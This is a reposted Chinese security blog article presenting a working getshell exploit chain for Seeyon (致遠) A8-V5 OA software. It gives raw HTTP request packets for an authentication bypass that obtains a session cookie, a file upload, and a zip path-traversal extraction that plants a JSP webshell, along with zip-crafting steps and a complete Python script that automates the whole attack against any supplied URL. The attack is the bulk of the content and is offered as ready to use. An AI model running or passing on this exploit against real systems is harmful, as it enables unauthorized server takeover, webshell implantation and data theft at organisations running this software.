碼上快樂

相關內容    簡體    繁體

致遠 OA 組合 getshell

本文轉載自   查看原文   2021-05-09 23:35   400    08、{ 滲透測試

測試版本為: 致遠 A8-V5 協同管理軟件 V6.1SP2

自行搭建環境:

image

Getshell 分三步

1.獲取cookie信息  
2.上傳壓縮文件   
3.解壓壓縮文件得到shell

獲取 cookie 信息

漏洞文件

/seeyon/thirdpartyController.do

數據包:

CODE 
1
2
3
4
5
6
7
8
9
10
11
12
13
 
POST /seeyon/thirdpartyController.do HTTP/1.1
Host: 192.168.1.88:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 133

method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1

獲取到 cookie
image

上傳壓縮文件

漏洞點:

/seeyon/fileUpload.do?method=processUpload&maxSize=

數據包:

CODE 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
 
POST /seeyon/fileUpload.do?method=processUpload&maxSize= HTTP/1.1
Host: 192.168.1.88:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.88:8080/seeyon/fileUpload.do?method=processUpload&maxSize=
Cookie: JSESSIONID=A4D1CCA965228F523B70833968568BE6
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------1416682316313
Content-Length: 1179

-----------------------------1416682316313
Content-Disposition: form-data; name="type"


-----------------------------1416682316313
Content-Disposition: form-data; name="extensions"


-----------------------------1416682316313
Content-Disposition: form-data; name="applicationCategory"


-----------------------------1416682316313
Content-Disposition: form-data; name="destDirectory"


-----------------------------1416682316313
Content-Disposition: form-data; name="destFilename"


-----------------------------1416682316313
Content-Disposition: form-data; name="maxSize"


-----------------------------1416682316313
Content-Disposition: form-data; name="isEncrypt"


-----------------------------1416682316313
Content-Disposition: form-data; name="file1"; filename="123.zip"
Content-Type: application/x-zip-compressed

zip文件
-----------------------------1416682316313--

直接替換上傳數據包 cookie 與地址信息發送會返回一個 fileurls 值
image

3. 解壓文件得到 shell

漏洞文件

/seeyon/ajax.do

數據包:

CODE 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
 
POST /seeyon/ajax.do HTTP/1.1
Host: 192.168.1.88:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=A4D1CCA965228F523B70833968568BE6
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 142

method=ajaxAction&managerName=portalDesignerManager&managerMethod=uploadPageLayoutAttachment&arguments=[0,"2021-04-10","2708692024033719158"]

image

驗證結果

訪問壓縮包里的文件進行驗證 解壓后文件位置位於

/seeyon/common/designer/pageLayout/壓縮包里文件名

成功 getshell
image

注:制作 zip 文件

新建兩個文件

layout.xml  必須存在否則在利用解壓漏洞時會解壓失敗空內容即可
12345678.txt  可是任意名稱與內容 想上傳webshell替換成webshell內容與jsp后綴即可

壓縮成 zip 文件
image

使用文本編輯 zip 包把 shell 文件名前三位替換成..\ 修改前和修改后位數不能變否則 zip 文件損壞
image

保存查看效果
image

反正能用:

PY 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
 
# coding:utf-8
import time
import requests
import re
import sys
import random
import zipfile


la = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0',
 'Content-Type': 'application/x-www-form-urlencoded'}

def generate_random_str(randomlength=16):
 random_str = ''
 base_str = 'ABCDEFGHIGKLMNOPQRSTUVWXYZabcdefghigklmnopqrstuvwxyz0123456789'
 length = len(base_str) - 1
 for i in range(randomlength):
 random_str += base_str[random.randint(0, length)]
 return random_str

mm = generate_random_str(8)

webshell_name1 = mm+'.jsp'
webshell_name2 = '../'+webshell_name1

def file_zip():
 shell = 'test' ## 替換shell內容
 zf = zipfile.ZipFile(mm+'.zip', mode='w', compression=zipfile.ZIP_DEFLATED)
 zf.writestr('layout.xml', "")
 zf.writestr(webshell_name2, shell)


def Seeyon_Getshell(urllist):

 url = urllist+'/seeyon/thirdpartyController.do'
 post = "method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04+LjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1"
 response = requests.post(url=url, data=post, headers=la)
 if response and response.status_code == 200 and 'set-cookie' in str(response.headers).lower():
 cookie = response.cookies
 cookies = requests.utils.dict_from_cookiejar(cookie)
 jsessionid = cookies['JSESSIONID']
 file_zip()
 print( '獲取cookie成功---->> '+jsessionid)
 fileurl = urllist+'/seeyon/fileUpload.do?method=processUpload&maxSize='
 headersfile = {'Cookie': "JSESSIONID=%s" % jsessionid}
 post = {'callMethod': 'resizeLayout', 'firstSave': "true", 'takeOver': "false", "type": '0',
 'isEncrypt': "0"}
 file = [('file1', ('test.png', open(mm+'.zip', 'rb'), 'image/png'))]
 filego = requests.post(url=fileurl,data=post,files=file, headers=headersfile)
 time.sleep(2)
 else:
 print('獲取cookie失敗')
 exit()
 if filego.text:
 fileid1 = re.findall('fileurls=fileurls\+","\+\'(.+)\'', filego.text, re.I)
 fileid = fileid1[0]
 if len(fileid1) == 0:
 print('未獲取到文件id可能上傳失敗!')
 print('上傳成功文件id為---->>:'+fileid)
 Date_time = time.strftime('%Y-%m-%d')
 headersfile2 = {'Content-Type': 'application/x-www-form-urlencoded','Cookie': "JSESSIONID=%s" % jsessionid}
 getshellurl = urllist+'/seeyon/ajax.do'
 data = 'method=ajaxAction&managerName=portalDesignerManager&managerMethod=uploadPageLayoutAttachment&arguments=%5B0%2C%22' + Date_time + '%22%2C%22' + fileid + '%22%5D'
 getshell = requests.post(url=getshellurl,data=data,headers=headersfile2)
 time.sleep(1)
 webshellurl1 = urllist + '/seeyon/common/designer/pageLayout/' + webshell_name1
 shelllist = requests.get(url=webshellurl1)
 if shelllist.status_code == 200:
 print('利用成功webshell地址:'+webshellurl1)
 else:
 print('未找到webshell利用失敗')



def main():
 if (len(sys.argv) == 2):
 url = sys.argv[1]
 Seeyon_Getshell(url)
 else:
 print("python3 Seeyon_Getshell.py http://xx.xx.xx.xx")

if __name__ == '__main__':
 main()
文章作者: Li qun
文章鏈接: https://www.ailiqun.xyz/2021/04/10/%E8%87%B4%E8%BF%9COA-%E7%BB%84%E5%90%88getshell/
版權聲明: 本博客所有文章除特別聲明外,均采用 CC BY-NC-SA 4.0 許可協議。轉載請注明來自 Liqun


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 致遠OA-A8協同管理軟件無需登錄getshell漏洞 通達OA后台getshell 通達OA11.6任意文件刪除+文件上傳組合GetShell 致遠OA ajaxAction formulaManager 文件上傳漏洞 致遠OA文件上傳漏洞——可以上傳webshell 通達OA 11.2后台getshell漏洞復現 通達OA 11.7 后台sql注入getshell漏洞復現 通達OA任意用戶登錄和后台GetShell漏洞復現 致遠OA-ajax.do任意文件上傳漏洞復現 致遠OA二開文檔(基礎的環境搭建,設置,引入外部js)
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM